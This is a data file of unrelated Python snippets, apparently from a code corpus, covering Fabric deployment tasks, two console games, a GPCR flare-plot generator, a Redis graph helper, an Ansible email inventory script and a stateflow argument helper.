def install_master(secret, aws_id_master, virtual_ip, lmaster_ip, lslave_ip):
    """Run the duo master install script (as root) on the master host,
    passing the shared secret, AWS instance id, virtual IP and the two
    private addresses as positional arguments."""
    with cd('/home/ubuntu/xuser/infra/duo'):
        command = ' '.join(['./install_master.sh', secret, aws_id_master,
                            virtual_ip, lmaster_ip, lslave_ip])
        sudo(command, user="root")
@hosts(slave_ip)
@with_settings(warn_only=True)
def install_slave(secret, aws_id_slave, virtual_ip, lmaster_ip, lslave_ip):
    """Run the duo slave install script (as root) on the slave host; the
    argument order mirrors install_master."""
    with cd('/home/ubuntu/xuser/infra/duo'):
        command = ' '.join(['./install_slave.sh', secret, aws_id_slave,
                            virtual_ip, lmaster_ip, lslave_ip])
        sudo(command, user="root")
@with_settings(warn_only=True)
def get_local_ip():
    """Collect each host's private (eth0) IP into the module-level
    `local_ip_list`; once every host has reported, print the full list.

    NOTE(review): this is Python 2 code (print statements) and relies on a
    mutable module-level global, which is reset below if a previous run left
    it full.
    """
    global local_ip_list
    if len(local_ip_list) == len(env.hosts):
        # A stale, already-full list means a previous run did not clean up.
        local_ip_list = []
        print "Clean local ip list. There is something wrong"
    result = run("ifconfig eth0 | grep inet | awk '{print $2}' | cut -d':' -f2")
    local_ip_list.append(result)
    if len(local_ip_list) == len(env.hosts):
        # All hosts have reported: print the gathered private IPs.
        for i in local_ip_list:
            print ("%s" % i)
@with_settings(warn_only=True)
@runs_once
def generate_ssl_key():
    """Generate the site SSL key on the local machine (runs once, not per host)."""
    with lcd('../ssl'):
        local('./ssl-key-gen.sh')
@parallel
@with_settings(warn_only=True)
def copy_ssl_key():
    """Upload the locally generated certificate to every host (via sudo)."""
    put('../ssl/site.pem', '/etc/ssl/private/site.pem', use_sudo=True)
@parallel
@with_settings(warn_only=True)
def reboot_all():
    """Reboot every host without waiting for it to come back up."""
    reboot(wait=0)
@parallel
@with_settings(warn_only=True)
def git_install():
    """Install git (as root) on every host."""
    sudo('apt-get install -y git', user="root")
@hosts(slave_ip)
@with_settings(warn_only=True)
def aws_configure_slave():
    """Interactively run `aws configure` as root on the slave host."""
    sudo('aws configure', user="root")
@hosts(master_ip)
@with_settings(warn_only=True)
def aws_configure_master():
    """Interactively run `aws configure` as root on the master host."""
    sudo('aws configure', user="root")
@with_settings(warn_only=True)
@runs_once
def aws_eu_central_1():
    """List the EC2 instances in eu-central-1, from the local machine."""
    local('aws ec2 describe-instances --region eu-central-1')
def find_master_slave_ips():
    """Placeholder: discover master/slave IPs from AWS instance metadata."""
    # TODO: from aws instance description gather below information for a group
    # TODO: Update the rest of the functions after this is implemented.
    #local_ip_list =[]
    #env.hosts = [master_ip, slave_ip]
    #master_ip
    #slave_ip
    #lmaster_ip
    #lslave_ip
    pass
def install_all():
    """Placeholder: one-shot clean install driver composed of the tasks above."""
    # TODO: Implement
    # Cover script which uses above all to install in a clean first time
    pass
| StarcoderdataPython |
1980703 | <filename>Python/Chittle_Ben FSE 2017-2018/Chittle, Ben - FSE.py
# Chittle, Ben - FSE.py
# 21 June 2018
# <NAME>
# This program contains 2 playable games, Tic Tac Toe and Guess the Number,
# which can be chosen, played, and replayed by the user(s).
# For pacing the program.
from time import sleep
# For generating random numbers used in the Tic Tac Toe A.I. and the number in
# the Guess the Number game.
from random import randint
# For retrieving multiple arbitrary values from lists.
from operator import itemgetter as get
# Allows the user to choose a game. It returns a number corresponding to the
# game that should run.
def chooseGame():
    """Prompt until the user enters 1 (Tic Tac Toe) or 2 (Guess the Number)."""
    sentStart = 0 # Variable determining the start position of a sentence.
    while True:
        # Asks the player which game to play until a valid value is given.
        try:
            game = int(input("What game would you like to play?\n(1 - Tic Tac Toe ||"
                             " 2 - Guess the Number)\n"[sentStart:]))
            if game < 1 or game > 2:
                # The original raised the undefined name `inputError` (a
                # NameError) and relied on a bare `except:` to swallow it;
                # raise a real ValueError instead and catch only that.
                raise ValueError("choice out of range")
        except ValueError:
            sentStart = 34 # Sentence starts at "(1 - Tic Tac Toe...".
            continue
        return game
# Introduces the player to Tic Tac Toe and acquires the symbol they want to use,
# the number of players, and the 2nd player's symbol (if there are 2 players).
def introTTT_1():
    """Show the Tic Tac Toe intro and return [players, sym1, sym2]."""
    badChars = ['', ' '] # List containing characters not to be chosen.
    sentStart = 0 # Variable determining the start position of a sentence.
    print ("Welcome to Tic Tac Toe!\n")
    sleep(1)
    print ("Your goal is to match 3 of your symbols in a row, column, or "
           "diagonal while\npreventing your opponent from doing the same.\n")
    sleep(1)
    while True:
        # Asks the user for the number of players until a valid value is given.
        try:
            players = int(input("Are you playing alone or with a friend? (1 or 2)\n"
                                [sentStart:]))
            if players < 1 or players > 2:
                # Was `raise inputError` (an undefined name, i.e. a NameError
                # silently caught by a bare except); raise ValueError instead.
                raise ValueError("player count out of range")
        except ValueError:
            sentStart = 40 # Sentence starts at "(1 or 2)".
            continue
        if players == 1:
            # Player 1 cannot pick the computer's character if playing alone.
            badChars.append('O')
            badChars.append('o')
        sleep(0.5)
        # P1 chooses their symbol. It's added to "badChars".
        sym1 = input("\nP1: What letter would you like to use? (single character)\n")
        while len(sym1) > 1 or sym1 in badChars: #Repeats until valid input.
            sym1 = input("P1: Try something else. (single character)\n")
        badChars.append(sym1.upper())
        badChars.append(sym1.lower())
        sleep(0.5)
        # P2 chooses their symbol.
        if players == 2:
            sym2 = input("\nP2: What letter would you like to use? (single character)\n")
            while len(sym2) > 1 or sym2 in badChars: #Repeats until valid input.
                sym2 = input("P2: Try something else. (single character)\n")
        else:
            sym2 = 'O'
        # Answers are added to a list which is returned.
        info = [players, sym1, sym2]
        return info
# Draws the board with the appropriate symbols each time it is called using the
# indices list to represent each position.
def createBoard_1():
    """Print the module-level `title` followed by the 3x3 grid stored in the
    module-level `board` list (indices 1-9; index 0 is unused)."""
    print (title)
    print ("7 |8 |9")
    print (" ", board[7], " | ", board[8], " | ", board[9])
    print ("_____|_____|_____")
    print ("4 |5 |6")
    print (" ", board[4], " | ", board[5], " | ", board[6])
    print ("_____|_____|_____")
    print ("1 |2 |3")
    print (" ", board[1], " | ", board[2], " | ", board[3])
    print (" | |\n")
# Creates a copy of the list representing the board for the computer to test moves.
def copyBoard_1(Board):
    """Return a shallow copy of *Board*.

    The manual append loop was replaced with the idiomatic ``list()``
    constructor; behavior is identical (a new independent list containing
    the same elements).
    """
    return list(Board)
# Returns True if the specified space on the board is unoccupied (a blank space).
def isOccupied_1(Board, Move):
    """Report whether board position *Move* is still blank.

    Note: despite the name, a True result means the space is *free*.
    """
    blank = ' '
    return Board[Move] == blank
# Acquires a player's move.
def getMove_1(Board, Move):
    """Prompt (using the module-level `title` prefix) until the player enters
    a digit 1-9 naming a currently blank square, and return it."""
    sentStart = 0
    nums = [1, 2, 3, 4, 5, 6, 7, 8, 9]
    # Loop while the move is out of range or the chosen square is taken
    # (isOccupied_1 returns True for a *free* square despite its name).
    while Move not in nums or isOccupied_1(Board, Move) == False:
        # Repeats until valid value given.
        try:
            Move = int(input(title[:2] + ": " + "Make your move. (1-9)\n"[sentStart:]))
        except:
            sentStart = 15 # Sentence starts at "(1-9)".
            continue
    return Move
# Acquires the computer's move.
def computerMove_1(Board, Move, sym1, sym2):
    """Pick the computer's (sym2) move.

    Priority: (1) win immediately if possible, (2) block the player's (sym1)
    winning move, (3) take a random free corner, (4) take the center,
    (5) take a random free edge.  Random choices retry until a free square
    from the relevant group is hit.
    """
    # Contains the values of the corners from the list representing the board.
    corners = list(get(1, 3, 7, 9)(Board))
    # Contains the values of the middle sides, top, and bottom.
    sideTop = list(get(2, 4, 6, 8)(Board))
    while True:
        # Used for choosing a random value from one of the lists when there is
        # more than one option.
        ranNum = randint(0, 3)
        # NOTE(review): the loops below include index 0 (the unused slot);
        # harmless since winner_1 only examines indices 1-9.
        for space in range(0, 10):
            # Determines whether the computer can make the winning move.
            copy = copyBoard_1(Board) # Creates a copy of the board.
            if copy[space] == ' ':
                # Makes each possible move. If it results in a win, it makes the
                # move.
                copy[space] = sym2
                if winner_1(copy, sym2):
                    return space
        for space in range(0, 10):
            # Determines whether the player can make the winning move.
            copy = copyBoard_1(Board) # Creates a copy of the board.
            if copy[space] == ' ':
                # Makes each possible move using the player's symbol. If it results
                # in a win, it makes the move to block it.
                copy[space] = sym1
                if winner_1(copy, sym1):
                    return space
        if ' ' in corners:
            # If any of the corners are free, it will make a move on an open one.
            Move = corners[ranNum] # Tries a random corner.
            if Move != ' ': # Retry if occupied.
                continue
            else:
                Move = [1, 3, 7, 9][ranNum] # Choose that space if free.
        elif Board[5] == ' ': # Moves in the center if free.
            Move = 5
        else:
            # If the middle top, sides, or bottom are free, it will make a move
            # on an open one.
            Move = sideTop[ranNum] # Tries a random position from list.
            if Move != ' ': # Retry if occupied.
                continue
            else:
                Move = [2, 4, 6, 8][ranNum] # Choose that space if free.
        break
    return Move
# Determines whether the most recent move should win.
def winner_1(Board, symbol):
    """Return True when *symbol* fills any complete row, column or diagonal
    of the 3x3 grid (board indices 1-9; index 0 is unused)."""
    winning_lines = (
        (7, 8, 9),  # top row
        (4, 5, 6),  # middle row
        (1, 2, 3),  # bottom row
        (7, 4, 1),  # left column
        (8, 5, 2),  # middle column
        (9, 6, 3),  # right column
        (7, 5, 3),  # diagonal (top left to bottom right)
        (9, 5, 1),  # diagonal (bottom left to top right)
    )
    return any(all(Board[i] == symbol for i in line) for line in winning_lines)
# Determines whether there is a tie.
def tie_1(Board):
    """Return True when no empty playable squares remain on the board.

    The playable squares are indices 1-9 (index 0 is unused), so the slice
    must run through index 9.  The previous ``Board[1:9]`` stopped at
    index 8 and reported a tie even while square 9 was still free.
    """
    return ' ' not in Board[1:10]
# Introduces the user to the Guess the Number game and acquires their name.
def introGuessGame_2():
    """Show the Guess the Number intro and return the player's name."""
    name = input("What's your name?\n")
    sleep(1)
    print ("Welcome to Guess the Number!\n")
    sleep(1)
    print ("Your goal is to guess a random number from 1 to 20 in 6 guesses"
           " or less.")
    return name
# Acquires the player's guess.
def getGuess_2(guess):
    """Prompt for guess number *guess* (1-6) until an int in 1..20 is given."""
    sentStart = 0 # Variable determining the start position of a sentence.
    sleep(0.5)
    print ("\n\nGuess %i out of 6" %guess) # Prints how many guesses the user has.
    while True:
        # Asks the user to input a number until valid input is given.
        try:
            pick = int(input("P1: Pick a number from 1 to 20.\n"[sentStart:]))
            if pick < 1 or pick > 20:
                # Was `raise inputError` (an undefined name, i.e. a NameError
                # swallowed by a bare except); raise a real ValueError and
                # catch only that.
                raise ValueError("guess out of range")
        except ValueError:
            sentStart = 23 # Sentence starts at "1 to 20".
            continue
        sleep(0.5)
        return pick
# Returns whether the player would like to play again.
def playAgain(subject):
    """Ask a yes/no question and return the raw 'y'/'Y'/'n'/'N' answer.

    *subject* is spliced into the prompt (e.g. "again",
    "a different game").
    """
    # This tuple holds the *accepted* answers; it was previously named
    # `badAns`, which said the opposite of what it meant.  The dead
    # `ans = ''` initialiser (immediately overwritten) was also removed.
    validAnswers = ('Y', 'y', 'N', 'n')
    ans = input("\nWould you like to play %s? (y / n)\n" %subject)
    # Asks the user for input until valid input is given.
    while ans not in validAnswers:
        ans = input("y / n\n")
    return ans
##############################
# Main program loop: pick a game, run it (with replay) and offer to switch
# games until the player declines.
while True:
    subject = "again"
    # This variable changes a sentence used in asking the player to play again
    # (allows the same sub-process to be used).
    game = chooseGame() # The player chooses the game they'd like to play.
    gamePlayed = False # Introduction to the game will be able to run.
    while game == 1: # Runs if the user chooses Tic Tac Toe.
        if not gamePlayed: # Runs the introduction on the first time through.
            info = introTTT_1()
            players = info[0]
            sym1 = info[1]
            sym2 = info[2]
            # Introduction won't run again until a new game is chosen.
            gamePlayed = True
        move = 0
        board = [" "] * 10 # The board is set up as a series of spaces.
        while True:
            title = "P1's turn." # The words at the top of the board.
            createBoard_1() # The current board is drawn.
            move = getMove_1(board, move) # Aquires the player's move.
            sleep(0.5)
            # The move is made on the board with Player 1's symbol.
            board[move] = sym1
            if winner_1(board, sym1):
                # If there is a winner, the board will be printed with the specified
                # title and the loop will break.
                title = "\nWINNER PLAYER 1!"
                createBoard_1()
                break
            elif tie_1(board):
                # If there is a tie, the board will be printed with the specified
                # title printed and the loop will break. There will only ever be a
                # tie on Player 1's turn.
                title = "\nTIE GAME!"
                createBoard_1()
                break
            if players == 2:
                # The program will get Player 2's turn in the same way as Player 1
                # if there are 2 players.
                title = "P2's turn."
                createBoard_1()
                move = getMove_1(board, move)
                sleep(0.5)
                board[move] = sym2
            else:
                # If there is only 1 player, the program will acquire the computer's
                # move similarly to Player 1.
                title = "Computer's Turn"
                createBoard_1()
                # The program will run an algorithm to acquire the computer's
                # move.
                move = computerMove_1(board, move, sym1, sym2)
                sleep(1)
                board[move] = sym2
            if winner_1(board, sym2):
                # If there is a winner, the board will be printed with the specified
                # title and the loop will break.
                if players == 2:
                    title = "WINNER PLAYER 2!"
                else:
                    title = "THE COMPUTER WINS!"
                createBoard_1()
                break
        ans = playAgain(subject) # Asks the player if they want to play again.
        if ans == 'y' or ans == 'Y':
            continue # Restarts at the beginning of the loop.
        else:
            # Jumps to asking the player if they want to play a different game.
            break
    while game == 2: # Runs if the player chooses the Number Guessing game.
        if not gamePlayed: # Runs the introduction on the first time through.
            name = introGuessGame_2()
            # Introduction won't run again until a new game is chosen.
            gamePlayed = True
        lower = 1 # Constant variables are set for randint parameters.
        upper = 20
        ranNum = randint(lower, upper)
        # Generates a random integer within the parameters.
        while True:
            sleep(1)
            for guess in range(1,7): # The player gets 6 chances.
                pick = getGuess_2(guess)
                if pick == ranNum:
                    # If the player guesses the number, this runs and breaks the
                    # loop.
                    sleep(0.5)
                    print ("Good job %s, you guessed my number!" %name)
                    break
                elif guess == 6:
                    # If the player is out of guesses, this runs.
                    sleep(0.5)
                    print ("You ran out of guesses!\nMy number was %i.\nBetter"
                           " luck next time!" %ranNum)
                elif pick < ranNum:
                    # If the player's guess is less than the number, this runs.
                    print ("\nGo higher.")
                else:
                    # This runs if none of the others are true, meaning the guess is
                    # higher than the number.
                    print ("\nGo lower.")
            break
        ans = playAgain(subject) # Asks the player if they want to play again.
        if ans == 'y' or ans == 'Y':
            continue # Restarts at the beginning of the loop.
        else:
            # Jumps to asking the player if they want to play a different game.
            break
    sleep(0.5)
    subject = "a different game"
    # Asks the player if they want to play a different game.
    ans = playAgain(subject)
    if ans == 'y' or ans == 'Y':
        # Restarts at the beginning of the loop, allowing the player to choose a
        # different game.
        continue
    else:
        break # Ends the program.
print("Thanks for playing!")
| StarcoderdataPython |
6620405 | from dynadb.models import DyndbFiles, DyndbFilesDynamics, DyndbModelComponents, DyndbCompound, DyndbDynamicsComponents,DyndbDynamics, DyndbModel, DyndbProtein,DyndbProteinSequence, DyndbModeledResidues
from view.assign_generic_numbers_from_DB import obtain_gen_numbering
from view.traj2flare_modified_wn import * #[!] Now it's the wn version (new version that uses MDtraj wernet_nilsson function)
from view.views import findGPCRclass, obtain_all_chains, obtain_DyndbProtein_id_list, obtain_seq_pos_info
from dynadb.pipe4_6_0 import *
from view.data import *
import re
import json
from Bio.PDB import *
from Bio import PDB
import itertools
import mdtraj as md
import numpy as np
import copy
import csv
def obtain_fplot_input(result, numbers, chain_name, current_class):
    """Translate an alignment *result* into the three lookup tables used by
    the flare-plot JSON writer.

    Returns a tuple of:
      - (pdb_resnum, chain) -> protein segment name,
      - (pdb_resnum, chain) -> shortened GPCR generic number ("nxnn"),
      - shortened generic number -> ["chain.pdb_resnum", ""] cluster entries.
    Positions with no PDB counterpart (entry "-") are skipped; name/cluster
    entries are only created for positions that have a generic number.
    """
    residue_groups = {}
    residue_names = {}
    clusters = {}
    generic_numbers = numbers[current_class]
    for pos in result:
        pdb_entry = pos[0]
        if pdb_entry == "-":  # position absent from the PDB
            continue
        pdb_resnum = pdb_entry[1]
        db_resnum = pos[1][1]
        gnum = generic_numbers[db_resnum][1]
        segment = generic_numbers[db_resnum][2]
        residue_groups[(pdb_resnum, chain_name)] = str(segment)
        if gnum:
            # Collapse the "n.nnxnn" numbering to the short "nxnn" form.
            short = gnum[:gnum.find(".")] + gnum[gnum.find("x"):]
            clusters[short] = [chain_name + "." + pdb_resnum, ""]
            residue_names[(pdb_resnum, chain_name)] = str(short)
    return (residue_groups, residue_names, clusters)
def create_fplot(self,dyn_id,newpath,pdbpath=None,trajpath=None,traj_id=None,stride=1):# Not sure what will happen in pdbs with more than 1 gpcr . Use traj 14 or 15 for dyn 1
    """Generates the json files necessary to visualize flare plots.

    Fixes applied here: the no-op debug statement ``type(result)`` was
    removed, and the empty-entry pruning comparison now uses ``[[], []]``
    (the previous ``([], [])`` compared a list to a tuple and was always
    False, so empty protein entries were never removed).
    """
    gpcr_mode = True
    if trajpath == None and traj_id:
        # NOTE(review): this assigns a DyndbFiles model instance, not a file
        # path string -- confirm create_json accepts it.
        trajpath = DyndbFiles.objects.get(id=traj_id)
    if pdbpath == None:
        pdbpath = DyndbFiles.objects.filter(dyndbfilesdynamics__id_dynamics=dyn_id, id_file_types__extension="pdb")[0].filepath
    chain_name_li = obtain_all_chains(pdbpath)
    if len(chain_name_li) == 0:
        error = "Protein chains not found."
        self.stdout.write(self.style.NOTICE(error))
        return
    prot_li_gpcr, dprot_li_all, dprot_li_all_info, pdbid = obtain_DyndbProtein_id_list(dyn_id)
    dprot_chains = {}
    chains_taken = set()
    prot_seq_pos = {}
    seq_pos_n = 1
    # Classify chains by protein: for each protein, dprot_chains holds a list
    # of (chain, matchpdbfa result) pairs plus the protein's seq_pos info.
    for prot_id, prot_name, prot_is_gpcr, prot_seq in dprot_li_all_info:
        seq_pos = []
        dprot_chains[prot_id] = [[], []]
        for chain_name in chain_name_li:
            checkpdb_res = checkpdb_ngl(pdbpath, segid="", start=-1, stop=9999999999999999999, chain=chain_name)
            if isinstance(checkpdb_res, tuple):
                tablepdb, pdb_sequence, hexflag = checkpdb_res
                result = matchpdbfa_ngl(prot_seq, pdb_sequence, tablepdb, hexflag)
                if isinstance(result, list):
                    # Each PDB chain is assigned to at most one protein.
                    if chain_name not in chains_taken:
                        chains_taken.add(chain_name)
                        dprot_chains[prot_id][0].append((chain_name, result))
                        (seq_pos, seq_pos_n) = obtain_seq_pos_info(result, seq_pos, seq_pos_n, chain_name, True)
        dprot_chains[prot_id][1] = seq_pos
        prot_seq_pos[prot_id] = (prot_name, seq_pos)
    # Drop proteins for which no chain matched.
    keys_to_rm = set()
    for key, val in dprot_chains.items():
        if val == [[], []]:
            keys_to_rm.add(key)
    for key in keys_to_rm:
        del dprot_chains[key]
    if chains_taken:  # To check if some result have been obtained
        for gpcr_DprotGprot in prot_li_gpcr:
            gpcr_Dprot = gpcr_DprotGprot[0]
            gpcr_Gprot = gpcr_DprotGprot[1]
            dprot_id = gpcr_Dprot.id
            dprot_name = gpcr_Dprot.name
            gen_num_res = obtain_gen_numbering(dyn_id, gpcr_Dprot, gpcr_Gprot)
            if len(gen_num_res) > 2:
                (numbers, num_scheme, db_seq, current_class) = gen_num_res
                current_class = findGPCRclass(num_scheme)
                # Sample one generic number to check the numbering format.
                gpcr_n_ex = ""
                for pos_gnum in numbers[current_class].values():
                    if pos_gnum[1]:  # We take the 1st instance of gpcr num as example
                        gpcr_n_ex = pos_gnum[1]
                        break
                if not "." in gpcr_n_ex:  # For the moment we only accept n.nnxnn format
                    error = "Error obtaining GPCR generic numbering."
                    self.stdout.write(self.style.NOTICE(error))
                    return
                (dprot_chain_li, dprot_seq) = dprot_chains[dprot_id]
                for chain_name, result in dprot_chain_li:
                    (resi_to_group, resi_to_name, cluster_dict) = obtain_fplot_input(result, numbers, chain_name, current_class)
                    model_res = DyndbModeledResidues.objects.filter(id_model__dyndbdynamics__id=dyn_id)
                    seg_to_chain = {mr.segid: mr.chain for mr in model_res}
                    if gpcr_mode:
                        # Prefix each generic number with its helix chain id.
                        for (pos, gnum) in resi_to_name.items():
                            if gnum != "None":
                                chain = gnum.split("x", 1)[0]
                                resi_to_name[pos] = chain + "." + gnum
                        create_json(self, True, trajpath, pdbpath, resi_to_group, resi_to_name, newpath, stride, seg_to_chain)
                    else:
                        create_json(self, False, trajpath, pdbpath, resi_to_group, resi_to_name, newpath, stride, seg_to_chain)
                    out_file = re.search("(\w*)(\.\w*)$", newpath).group()
                    self.stdout.write(self.style.SUCCESS('JSON file ' + out_file + ' successfully created'))
            else:
                error = "Error obtaining GPCR generic numbering."
                self.stdout.write(self.style.NOTICE(error))
                return
    else:
        error = "Error assigning the GPCR generic numbering to the PDB"
        self.stdout.write(self.style.NOTICE(error))
        return
| StarcoderdataPython |
11315990 | from flask import abort as abort
from flask import flash as flash
from flask import redirect as redirect
from flask import url_for as url_for
from .app import Djask as Djask
from .blueprints import APIBlueprint as APIBlueprint
from .blueprints import Blueprint as Blueprint
from .globals import current_app as current_app
from .globals import g as g
from .globals import request as request
from .globals import session as session
# Package version string.
__version__ = "0.5.0"
# Public API of the djask package (mirrors the aliased imports above).
__all__ = [
    "abort",
    "flash",
    "redirect",
    "url_for",
    "Djask",
    "Blueprint",
    "APIBlueprint",
    "current_app",
    "request",
    "g",
    "session",
]
| StarcoderdataPython |
3412103 | # file: redis_graph_common.py
# the purpose of this file is to implement common graph functions
import redis
import copy
class Redis_Graph_Common:
    """Helpers for encoding graph nodes as Redis keys.

    A node is identified by a (relationship, label, name) triple; a path of
    such triples (a "namespace") is serialised into a single Redis key using
    four high-codepoint separator characters so that the pieces can be split
    apart again unambiguously.
    """

    def __init__(self, redis, separator=chr(130), relationship_sep=chr(131),
                 label_sep=chr(132), header_end=chr(133)):
        # Store the connection handle and the four delimiter characters.
        self.redis = redis
        self.sep = separator
        self.rel_sep = relationship_sep
        self.label_sep = label_sep
        self.header_end = header_end

    def make_string_key(self, relationship, label, name):
        """Serialise a single (relationship, label, name) triple."""
        return "".join((relationship, self.rel_sep, label, self.label_sep,
                        name, self.header_end))

    def reverse_string_key(self, string_key):
        """Split a serialised triple back into (relationship, label, name)."""
        pieces = string_key.split(self.rel_sep)
        relationship = pieces[0]
        rest = pieces[1].split(self.label_sep)
        label = rest[0]
        name = rest[1][:-1]  # drop the trailing header_end character
        return relationship, label, name

    def _convert_namespace(self, namespace):
        """Join the serialised triples of *namespace* behind the path separator."""
        parts = [self.make_string_key(item[0], item[1], item[2])
                 for item in namespace]
        return self.sep + self.sep.join(parts)

    def construct_node(self, namespace, relationship, label, name):
        """Extend *namespace* with a child triple, store the node's hash in
        Redis, and return (redis_key, extended_namespace)."""
        extended = list(namespace)  # shallow copy; caller's list is untouched
        extended.append([relationship, label, name])
        key = self._convert_namespace(extended)
        self.redis.hset(key, "name", name)
        self.redis.hset(key, "namespace", self._convert_namespace(extended))
        return key, extended

    def match(self, relationship, label, name, starting_path=None):
        """Glob-match Redis keys ending in the given triple; *starting_path*
        (a serialised key prefix) anchors the match when provided."""
        suffix = self._convert_namespace([[relationship, label, name]])
        prefix = starting_path if starting_path is not None else ""
        return self.redis.keys(prefix + "*" + suffix)

    def delete_all(self):
        """Delete every key created by this helper (those starting with sep)."""
        for key in self.redis.keys(self.sep + "*"):
            self.redis.delete(key)
if __name__ == "__main__":
    # test driver
    # NOTE: uses Python 2 print statements; run under Python 2 with a local
    # Redis on db 11.
    redis = redis.StrictRedis( host = "127.0.0.1", port=6379, db = 11 )
    common = Redis_Graph_Common( redis)
    # Build a three-level chain: head -> level_one -> level_two.
    redis_key, new_namespace =common.construct_node( [], "","head","head" )
    print redis_key,new_namespace
    print redis.hgetall(redis_key)
    redis_key, new_namespace =common.construct_node( new_namespace,"relation 1","level_one","h1" )
    print redis_key,new_namespace
    print redis.hgetall(redis_key)
    redis_key, new_namespace =common.construct_node( new_namespace,"relation 2","level_two","h2" )
    print redis_key,new_namespace
    print redis.hgetall(redis_key)
    print "simple match"
    print common.match( "relation 2","level_two","h2")
    print "starting match"
    # NOTE(review): match() expects starting_path to be a key *string*; a
    # namespace list is passed here, which would make the string
    # concatenation inside match() fail -- confirm intended usage.
    print common.match( "*","level_two","h2",[["","head","head"]])
    print "all the keys"
    print redis.keys("*")
    print "none of the keys"
    common.delete_all()
    print redis.keys("*")
| StarcoderdataPython |
342325 | <gh_stars>0
# Combine and Clean
import pandas as pd
# Load the merged dataset, drop exact duplicate rows, and write the result.
temp_df = pd.read_csv('mergedARFINAL.csv')
#
temp_df = temp_df.drop_duplicates()
print(temp_df)
# NOTE(review): this also writes the pandas index as a column; pass
# index=False if that is not wanted -- confirm downstream expectations.
temp_df.to_csv('cleaned.csv')
| StarcoderdataPython |
3284193 | <filename>notifications/notifications.py
#!/usr/bin/env python
import argparse
import requests
import yaml
import os
try:
import json
except ImportError:
import simplejson as json
# Define the following environment variables:
# API_URL - The base url for the omp-data-api
# EMAIL_CONTENT_URL - Should be a url which points to a yaml file with the email
#                     content to send. The yaml file should contain vars 'body'
#                     and 'title'.
# TAG - The tag you want to pull users and groups from.
# EMAIL_USERNAME - The email username from which you want to send notifications
# EMAIL_PASSWORD - The password for said username
api_url = os.environ['API_URL']
email_content_url = os.environ['EMAIL_CONTENT_URL']
my_tag = os.environ['TAG']
username = os.environ['EMAIL_USERNAME']
# BUG FIX: this line had been mangled into `os.<PASSWORD>['<PASSWORD>']`,
# a syntax error. Restored to an environment lookup; 'EMAIL_PASSWORD' mirrors
# the 'EMAIL_USERNAME' key above -- TODO confirm the exact variable name.
password = os.environ['EMAIL_PASSWORD']
users_url = api_url + "/users"
class Inventory(object):
    """Dynamic Ansible inventory: pulls the users of one tag from the
    omp-data-api and emits mail-notification variables as JSON on stdout."""
    def __init__(self):
        self.parse_cli_args()
        self.inventory = {}
        if self.args.list:
            self.handle_list()
        elif self.args.host != None:
            # NOTE(review): handle_host() is never defined on this class;
            # running with --host would raise AttributeError.
            self.handle_host()
        print(json.dumps(self.inventory))
    def handle_list(self):
        """Fetch users for the configured tag and build the `all` group vars."""
        my_tag_users = users_url + '/' + my_tag
        r_users = requests.get(my_tag_users).json()
        # SECURITY(review): yaml.load without an explicit Loader can execute
        # arbitrary objects if the content URL is untrusted; prefer safe_load.
        email_content = yaml.load(requests.get(email_content_url).text)
        mail = {
            "title": email_content['title'],
            "body": email_content['body'],
            "users": self.generate_user_info_list(r_users),
            "email_to": self.generate_send_list(r_users),
            "mail": {
                "host": "smtp.gmail.com",
                "port":"465",
                "secure": "always",
                "username": username,
                "password": password,
                "subtype": "html",
            }
        }
        self.inventory = {'all': { "vars": mail}}
    def generate_send_list(self, user_data):
        """Return the list of recipient email addresses."""
        send_list = []
        for user in user_data:
            send_list.append(user['email'])
        return send_list
    def generate_user_info_list(self, user_data):
        """Return per-user dicts (name, username derived from email, ...)."""
        user_info_list = []
        for user in user_data:
            user_info_list.append({
                'first_name': user['first_name'],
                'username': user['email'].split('@')[0],
                # NOTE(review): '<PASSWORD>' is a dataset-anonymization
                # placeholder; the original literal is unknown -- confirm.
                'password': '<PASSWORD>',
                'email': user['email'],
                'notify_user': True
            })
        return user_info_list
    def parse_cli_args(self):
        """Parse the standard dynamic-inventory flags (--list / --host)."""
        parser = argparse.ArgumentParser(
            description='Produce an Ansible Inventory from a file')
        parser.add_argument('--list', action='store_true')
        parser.add_argument('--host', action='store')
        self.args = parser.parse_args()
# Build (and print) the inventory as soon as the script runs.
Inventory()
| StarcoderdataPython |
230753 | import asyncio
import logging
import traceback
from abc import abstractmethod
from itertools import chain
from typing import Any, Dict, List, Set, Tuple
from stateflow import SilentError
from stateflow.common import Observable, T, ev, is_wrapper
from stateflow.decorators import DecoratedFunction
from stateflow.errors import ArgEvalError, EvalError, raise_need_async_eval
from stateflow.notifier import Notifier, ScopedName
class ArgsHelper:
    """Normalize a call's (args, kwargs) against an optional signature.

    When a signature is available, defaults are applied and each argument is
    paired with its positional index and parameter name; otherwise arguments
    are kept as-is with None placeholders for the missing metadata.
    """
    def __init__(self, args, kwargs, signature, callable):
        if signature:
            # support default parameters
            try:
                bound_args = signature.bind(*args, **kwargs) # type: inspect.BoundArguments
                bound_args.apply_defaults()
            except Exception as e:
                raise Exception('during binding {}{}'.format(callable.__name__, signature)) from e
            args_names = list(signature.parameters)
            self.args = bound_args.args
            self.kwargs = bound_args.kwargs
            # Name each positional arg; pad with None for *args overflow.
            self.args_names = args_names[0:len(self.args)]
            self.args_names += [None] * (len(self.args) - len(self.args_names))
            # Positional index of each kwarg, or None for **kwargs-only names.
            self.kwargs_indices = [(args_names.index(name) if name in args_names else None)
                                   for name in self.kwargs.keys()]
        else:
            self.args = args
            self.kwargs = kwargs
            self.args_names = [None] * len(self.args)
            self.kwargs_indices = [None] * len(self.kwargs)
    def iterate_args(self):
        """Yield (index, name, value) for each positional argument."""
        return ((index, name, arg) for name, (index, arg) in zip(self.args_names, enumerate(self.args)))
    def iterate_kwargs(self):
        """Yield (index, name, value) for each keyword argument."""
        return ((index, name, arg) for index, (name, arg) in zip(self.kwargs_indices, self.kwargs.items()))
def eval_args(args_helper: ArgsHelper, pass_args, func_name, call_stack) -> Tuple[List[Any], Dict[str, Any]]:
    """Evaluate (unwrap) every argument described by *args_helper*.

    Arguments whose position or name appears in *pass_args* are forwarded
    untouched; every other argument is evaluated with ``ev``.  A failure is
    reported as an ArgEvalError tagged with the argument and function names.
    """
    def unwrap(index, name, arg):
        try:
            if index in pass_args or name in pass_args:
                return arg
            return ev(arg)
        except Exception as exc:
            raise ArgEvalError(name or str(index), func_name, call_stack, exc)
    positional = [unwrap(index, name, arg)
                  for index, name, arg in args_helper.iterate_args()]
    keyword = {name: unwrap(index, name, arg)
               for index, name, arg in args_helper.iterate_kwargs()}
    return positional, keyword
def observe(arg, notifier):
    """Attach *notifier* as an observer of *arg*, which may be a Notifier
    itself or any wrapper exposing ``__notifier__``."""
